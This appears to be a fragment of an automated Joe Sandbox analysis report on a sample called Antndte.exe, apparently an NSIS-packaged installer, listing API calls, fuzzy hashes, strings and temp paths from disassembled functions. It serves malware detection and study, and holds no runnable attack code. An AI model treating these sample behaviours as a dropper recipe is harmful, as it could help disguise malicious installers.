                                                                                                                                • Opcode Fuzzy Hash: 4d409e155a61ffd0ac71ab5cd1aa4f2a7c0b45529f7f932e188af2d6c0b8514a
                                                                                                                                • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed, Not Executed)
                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                                                                • lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                                                                • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,0040325E), ref: 00405341
                                                                                                                                • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll), ref: 00405353
                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll
                                                                                                                                • API String ID: 2531174081-4105306982
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountTick$wsprintf
                                                                                                                                • String ID: ... %d%%$FrA$@
                                                                                                                                • API String ID: 551687249-1685835555
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                                                                                • wsprintfW.USER32 ref: 0040663E
                                                                                                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                                                                                • GetLastError.KERNEL32 ref: 0040580C
                                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405821
                                                                                                                                • GetLastError.KERNEL32 ref: 0040582B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                • API String ID: 3449924974-3370423016
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph (legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • GetTickCount.KERNEL32 ref: 00405DC1
                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Antndte.exe",00403371,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76D63420,004035BF), ref: 00405DDC
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                • String ID: "C:\Users\user\Desktop\Antndte.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                • API String ID: 1716503409-2524661860
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                  • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                  • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                                                                                                  • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                                                                                                  • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1791698881-3916222277
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                • String ID: !
                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm118D.tmp,00000023,00000011,00000002), ref: 00402429
                                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsm118D.tmp,00000000,00000011,00000002), ref: 00402469
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsm118D.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsm118D.tmp
                                                                                                                                • API String ID: 2655323295-3586511968
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Close$Enum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 464197530-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405C0C
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                                                  • Part of subcall function 004057B5: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057F8
                                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Undige\trivant,?,00000000,000000F0), ref: 0040164D
                                                                                                                                Strings
                                                                                                                                • C:\Users\user\AppData\Local\Temp\Undige\trivant, xrefs: 00401640
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Undige\trivant
                                                                                                                                • API String ID: 1892508949-226500509
                                                                                                                                • Opcode ID: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                                                                                                • Instruction ID: f4fc84295b44ed4b17ac4e1ae603b231d2bd930c419d474b78473434f223dd35
                                                                                                                                • Opcode Fuzzy Hash: 64933fb819e76c9c5a4bf4a349c51baae94111e9253f76940e8e3ccf7a91a371
                                                                                                                                • Instruction Fuzzy Hash: 7711BE31504104ABCF316FA4CD01AAF36A0EF14368B28493BEA45B22F1DB3E4E519A4E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,coleoptera Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405C0C
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C11
                                                                                                                                  • Part of subcall function 00405BFE: CharNextW.USER32(00000000), ref: 00405C29
                                                                                                                                • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420,00000000), ref: 00405CB4
                                                                                                                                • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420), ref: 00405CC4
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                • String ID: C:\
                                                                                                                                • API String ID: 3248276644-3404278061
                                                                                                                                • Opcode ID: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                                                                                • Instruction ID: 85ea7651a51856ee7c4c0712bbf35357d52fdd33bb29f336d43f3a771a20a055
                                                                                                                                • Opcode Fuzzy Hash: a970eb1a3142989cf927e9e4643bcace7998e9650737c8fd412cf721476e62ae
                                                                                                                                • Instruction Fuzzy Hash: 0DF0F925109F5215F622323A1D09EAF2554CF83368716463FF952B16D5DA3C99038D7D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                                                                                                • RegCloseKey.KERNELBASE(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll), ref: 004061A1
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                • String ID: Call
                                                                                                                                • API String ID: 3356406503-1824292864
                                                                                                                                • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                                                                                                • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                                                • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405890
                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040589D
                                                                                                                                Strings
                                                                                                                                • Error launching installer, xrefs: 0040587A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                • String ID: Error launching installer
                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                • Instruction ID: d54ab7d3c02f92ec190dfac26e1bcd6e14271da7ed0e34d6283108f8b7c5a0e7
                                                                                                                                • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                                                                                                • Instruction Fuzzy Hash: D4E09AB5900209BFEB109F65DD49F7B77ACEB04744F004565BD50F2150D778D8148A78
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402057
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                                                                                  • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,00000000,0041C000,76D623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                                                                                  • Part of subcall function 004052E6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,0040325E), ref: 00405341
                                                                                                                                  • Part of subcall function 004052E6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm118D.tmp\System.dll), ref: 00405353
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                                                                                  • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402068
                                                                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 004020E5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 334405425-0
                                                                                                                                • Opcode ID: 953b997ac775c04cbd0441a481d0b8612512d0b60dab740abc81934434bd1b9e
                                                                                                                                • Instruction ID: 42f79ed1eba5b951ee52ea84f7896f3e8cd2b7b6c2435203e6ffc1da5cb37fd9
                                                                                                                                • Opcode Fuzzy Hash: 953b997ac775c04cbd0441a481d0b8612512d0b60dab740abc81934434bd1b9e
                                                                                                                                • Instruction Fuzzy Hash: EF21C271900208EACF20AFA5CE4DAAE7A70AF04358F64413BF611B51E0DBBD8941DA5E
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GlobalFree.KERNEL32(007594E0), ref: 00401BE1
                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                • String ID: Call
                                                                                                                                • API String ID: 3394109436-1824292864
                                                                                                                                • Opcode ID: f3fbed8c59e12bb8f0c71ec90718954b46427ffbab8605654bb2098ce1dab203
                                                                                                                                • Instruction ID: 92ace51ac37ea5806125e07fe733601b5cdc010b72bea360b2f02f73c4ad7c89
                                                                                                                                • Opcode Fuzzy Hash: f3fbed8c59e12bb8f0c71ec90718954b46427ffbab8605654bb2098ce1dab203
                                                                                                                                • Instruction Fuzzy Hash: 4921C072A01100DFDB20EB94CE8495A76A9AF44318725013BF902F72D1DA78A9519B5D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 004065C5: FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,76D63420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76D63420), ref: 004065D0
                                                                                                                                  • Part of subcall function 004065C5: FindClose.KERNELBASE(00000000), ref: 004065DC
                                                                                                                                • lstrlenW.KERNEL32 ref: 00402293
                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 0040229E
                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004022C7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1486964399-0
                                                                                                                                • Opcode ID: 834dd4c3fab03f97c3ef7fc9990c8d4f3de421b30695c3237dbe986a75224924
                                                                                                                                • Instruction ID: 7b2fc1264b4fb0dc72f9b007f51c651f6a3d170a065e006ef865ab6f7e8bf7d8
                                                                                                                                • Opcode Fuzzy Hash: 834dd4c3fab03f97c3ef7fc9990c8d4f3de421b30695c3237dbe986a75224924
                                                                                                                                • Instruction Fuzzy Hash: D6117C71904308AADB10EFF99E49A9EB7B8AF14354F10457FA405FB2D1E6BCD8408B59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • CreateFileA.KERNELBASE(00000000), ref: 1000295B
                                                                                                                                • GetLastError.KERNEL32 ref: 10002A62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.10001049251.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.10000981678.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000000.00000002.10001121191.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                • Associated: 00000000.00000002.10001192333.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_10000000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateErrorFileLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1214770103-0
                                                                                                                                • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                                • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                                                                                                • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                                                                                                • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsm118D.tmp,00000000,00000011,00000002), ref: 00402551
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                • Opcode ID: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                                                                                                • Instruction ID: 5dbb434a41a715d7517c89e318d331cd35bfdf9d93bbd69694c25902619df99f
                                                                                                                                • Opcode Fuzzy Hash: 8261bc8437de9397d7efa493d3c14ec671ad5d0a4e3b3d70237c1a055cd98deb
                                                                                                                                • Instruction Fuzzy Hash: DC11A331910209EFEF24DFA4CA585BEB6B4EF04354F21843FE046A72C0D7B84A45DB59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessageSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                                                                                                • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                                                                                                • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseDeleteValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2831762973-0
                                                                                                                                • Opcode ID: fac0fa569ca165b0481b34043c061d8b849461066cef3e30bb278c6306723ed1
                                                                                                                                • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                                                                                                • Opcode Fuzzy Hash: fac0fa569ca165b0481b34043c061d8b849461066cef3e30bb278c6306723ed1
                                                                                                                                • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • ShowWindow.USER32(000103D8,?), ref: 00401587
                                                                                                                                • ShowWindow.USER32(000103D2), ref: 0040159C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ShowWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1268545403-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                                                                                                  • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                                                                                                  • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                                                                                                  • Part of subcall function 004065EC: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406652
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.9986550491.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Antndte.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
